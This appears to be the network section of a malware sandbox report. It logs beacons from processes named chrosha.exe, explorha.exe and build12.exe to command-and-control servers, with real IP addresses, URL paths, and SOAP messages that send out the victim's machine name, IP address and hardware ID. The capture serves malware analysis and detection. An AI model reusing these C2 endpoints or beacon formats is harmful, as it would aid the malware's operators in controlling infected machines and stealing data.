Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:06.315279961 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:06.567028046 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
246 | 192.168.2.5 | 50087 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:06.770817041 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:07.013602972 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
247 | 192.168.2.5 | 50088 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:06.935767889 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:07.183952093 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
248 | 192.168.2.5 | 50089 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:07.267776012 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:07.521595001 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
249 | 192.168.2.5 | 50090 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:07.437946081 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:07.691354990 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
250 | 192.168.2.5 | 50091 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:07.890989065 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:08.142723083 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
251 | 192.168.2.5 | 50092 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:08.055644989 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:08.303412914 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
252 | 192.168.2.5 | 50095 | 147.185.221.19 | 30946 | 7324 | C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:08.371130943 CEST | 248 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95714
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
Apr 19, 2024 03:31:09.021238089 CEST | 1289 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95714
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdates xmlns="http://tempuri.org/"><user xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:City>UNKNOWN</a:City><a:Country>US</a:Country><a:FileLocation>C:\Users\user\AppData\Local\Temp\1000188001\build12.exe</a:FileLocation><a:Hardware>9F196B497BDFD0CED832D4AB8AAC3B4F</a:Hardware><a:IPv4>81.181.57.52</a:IPv4><a:Language>English (United Kingdom)</a:Language><a:MachineName>user</a:MachineName><a:Monitor>
Apr 19, 2024 03:33:00.398436069 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
Apr 19, 2024 03:33:00.998579979 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
Apr 19, 2024 03:33:02.201956987 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
Apr 19, 2024 03:33:04.602530003 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
Apr 19, 2024 03:33:09.410851002 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
253 | 192.168.2.5 | 50094 | 147.185.221.19 | 30946 | 5608 | C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:08.371131897 CEST | 248 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95713
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
Apr 19, 2024 03:31:09.034512043 CEST | 1289 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                                                                                                                                                                      Host: b-stamps.gl.at.ply.gg:30946
                                                                                                                                                                                                                                      Content-Length: 95713
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdates xmlns="http://tempuri.org/"><user xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:City>UNKNOWN</a:City><a:Country>US</a:Country><a:FileLocation>C:\Users\user\AppData\Local\Temp\1000187001\build12.exe</a:FileLocation><a:Hardware>9F196B497BDFD0CED832D4AB8AAC3B4F</a:Hardware><a:IPv4>81.181.57.52</a:IPv4><a:Language>English (United Kingdom)</a:Language><a:MachineName>user</a:MachineName><a:Monitor>
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:00.192931890 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:00.497421026 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:01.097130060 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:02.312182903 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:04.713609934 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:09.519361973 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 261
                                                                                                                                                                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:59 GMT
                                                                                                                                                                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      254 | 192.168.2.5 | 50093 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:08.399171114 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:08.652082920 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      255 | 192.168.2.5 | 50096 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:08.557076931 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:08.814207077 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
256         192.168.2.5  50097        193.233.132.167  80                8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:09.003595114 CEST  155                OUT        POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:09.242697001 CEST  197                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
257         192.168.2.5  50098        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:09.179227114 CEST  158                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:09.423626900 CEST  219                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
258         192.168.2.5  50099        193.233.132.56   80                4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp                             Bytes transferred  Direction  Data
Apr 19, 2024 03:31:09.454112053 CEST  312                OUT        POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
